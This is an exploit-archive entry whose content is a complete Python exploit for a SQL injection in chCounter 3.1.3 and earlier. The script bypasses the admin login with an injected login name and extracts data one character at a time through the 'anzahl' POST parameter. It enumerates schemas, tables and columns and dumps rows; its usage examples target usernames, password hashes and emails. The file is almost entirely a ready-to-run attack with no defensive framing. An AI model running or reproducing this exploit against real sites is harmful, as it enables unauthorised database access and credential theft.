ExploitFixes
chCounter <= 3.1.3 SQL Injection Vulnerability 2010-11-18 17:15:12

#!/usr/bin/python
#
# Exploit Title: chCounter &lt;= 3.1.3 SQLInjection
# Date: 2010/11/18
# Author: Matias Fontanini([email protected]).
# Software Link: http://chcounter.org/chCounter3/getfile.php?id=5
# Version: 3.1.3
# Tested on: Ubuntu Server 10.04 with apache
#
# Requirements:
# - Downloads must be enabled(this is not default).
# - magic_quotes off.
# - Access to administration site(can be bypassed if magic_quotes off)
#
# =SQLInjection=
# Location: administration/index.php?cat=downloads&amp;edit=
# Affected parameters: anzahl
# Method: POST
# Severity: High
# Description: When accessing administration/index.php?cat=downloads&amp;edit=VALID_ID
# and using a valid download id, an attacker is able to manipulate the &quot;anzahl&quot;
# parameter to perform queries which only involve returning an integer. The query
# output will be sent back to the client in the &quot;anzahl&quot; text input.
# Exploit: An attacker could perform repeated crafted requests to retrieve any
# database records for which the user has access.

import sys
import httplib, urllib
import types

lookupString='name=&quot;anzahl&quot; value=&quot;'

def generateHeaders(host, sessid):
headers = {'Host':host,
'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-us,en;q=0.5',
'Accept-Encoding':'deflate',
'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive':'115',
'Connection':'keep-alive',
'Content-Type':'application/x-www-form-urlencoded',
'Referer':'http://' + host,
'Cookie':'PHPSESSID='+sessid}
if sessid == '':
del headers['Cookie']
return headers


def loginRequest(connection, sessid, host, path):
headers = generateHeaders(host, sessid)
params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''})
connection.request('POST', path + 'administration/index.php', params, headers)
return connection.getresponse()


def generateSessId(connection, host, path):
headers = generateHeaders(host, '')
connection.request('GET', path + 'stats/online_users.php', '', headers)
response = connection.getresponse()
cookie = response.getheader('Set-Cookie')
if type(cookie) is types.NoneType:
print '[-] Could not get session id. Wrong path?'
exit(2)
return cookie[10:cookie.find(';')]

def genSessid(host, path):
print '[+] Trying ' + host + path
con = connectToHost(host)
sessid = generateSessId(con, host, path)
print '[+] Acquired PHPSESSID -&gt; ' + sessid
con = connectToHost(sys.argv[1])
output = loginRequest(con, sessid, host, path).read()
if output.find('login_name') != -1:
print '[-] Could not bypass login'
exit(7)
return sessid

def guessLen(sessid, host, field, path, dId, table):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'})
connection.request('POST', path + 'administration/index.php?cat=downloads&amp;edit='+str(dId), params, headers)
response = connection.getresponse().read()
if response.find('command denied') != -1:
print '[-] Could not acces table. Acces denied.'
exit(4)
index = response.find(lookupString)
return int(str(response[index+len(lookupString):response.find('&quot;', index+len(lookupString))]))


def guessField(sessid, host, path, dId, field, table):
sz=guessLen(sessid, host, field, path, dId, table)
headers = generateHeaders(host, sessid)
i=1
while i &lt;= sz:
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'})
connection.request('POST', path + 'administration/index.php?cat=downloads&amp;edit='+str(dId), params, headers)
response = connection.getresponse().read()
index = response.find(lookupString)
sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('&quot;', index+len(lookupString))]))))
sys.stdout.flush()
i += 1


def getValidId(sessid, host, path):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers)
response = connection.getresponse().read()
if response.find('ID') == -1:
print '[-] Downloads seem to be deactivated'
exit(6)
index=response.find('index.php?cat=downloads&amp;edit=')
return int(str(response[index+len('index.php?cat=downloads&amp;edit='):response.find('&quot;', index+len('index.php?cat=downloads&amp;edit='))]))

def getRowCount(sessid, host, path, dId, field, table):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select count(distinct('+field+')) from '+table+')'})
connection.request('POST', path + 'administration/index.php?cat=downloads&amp;edit='+str(dId), params, headers)
response = connection.getresponse().read()
if response.find('command denied') != -1:
print '[-] Could not acces table. Acces denied.'
exit(4)
index = response.find(lookupString)
return int(str(response[index+len(lookupString):response.find('&quot;', index+len(lookupString))]))

def getSchemas(sessid, host, path, dId):
rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata')
print '[+] Schema count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Table name: ')
guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i))
print ''

def getTables(sessid, host, path, dId):
rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables')
print '[+] Table count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Table name: ')
guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i))
print ''


def getColumns(sessid, host, path, dId, table):
rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'')
print '[+] Column count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Column name: ')
guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i))
print ''

def getItems(sessid, host, path, dId, table, columns, orderby):
rows=getRowCount(sessid, host, path, dId, columns[0], table)
print '[+] Item count: ' + str(rows)
print '[+] Dump:'
for i in range(0, rows):
for col in columns:
if len(orderby):
sys.stdout.write(' || ')
guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i))
else:
sys.stdout.write(' || ')
guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i))
print ' || '

def connectToHost(host):
con = httplib.HTTPConnection(sys.argv[1], 80)
tries=5
recon=True
while tries &gt; 0 and recon == True:
try:
con.connect();
recon = False
except:
tries -= 1
if tries == 0:
print '[-] Could not establish connection'
exit(3)
return con

def printHelp():
print '[-] Usage ' + sys.argv[0] + ' &lt;WEBSERVER&gt; &lt;PATH_TO_CHCOUNTER&gt; &lt;OPTION&gt; [ARGS]'
print ' OPTION can be:'
print ' -t to list all tables'
print ' -c &lt;TABLE&gt; to list all columns from table TABLE'
print ' -s &lt;TABLE&gt; to list all columns from table TABLE'
print ' -i &lt;TABLE&gt; &lt;COLUMNS*&gt; [ORDERBY] to list TABLE:COLUMN items.'
print ' COLUMNS* can be a comma-separated list of columns'
print ''
print ' Examples:'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -t'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -s'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -c users'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username,passwd,email'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username user_id'
print ' The last example outputs result ordered by user_id'
exit(1)

if len(sys.argv) &lt; 4:
printHelp()

sessid = genSessid(sys.argv[1], sys.argv[2])
valId = getValidId(sessid, sys.argv[1], sys.argv[2])

if sys.argv[3] == '-t':
getTables(sessid, sys.argv[1], sys.argv[2], valId)
exit(0)
if sys.argv[3] == '-c':
if len(sys.argv) &lt; 5:
printHelp()
getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4])
exit(0)
if sys.argv[3] == '-i':
if len(sys.argv) &lt; 6:
printHelp()
orderby=''
if len(sys.argv) == 7:
orderby = sys.argv[6]
orderby = sys.argv[6]
getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby)
exit(0)
if sys.argv[3] == '-s':
if len(sys.argv) &lt; 4:
printHelp()
getSchemas(sessid, sys.argv[1], sys.argv[2], valId)
exit(0)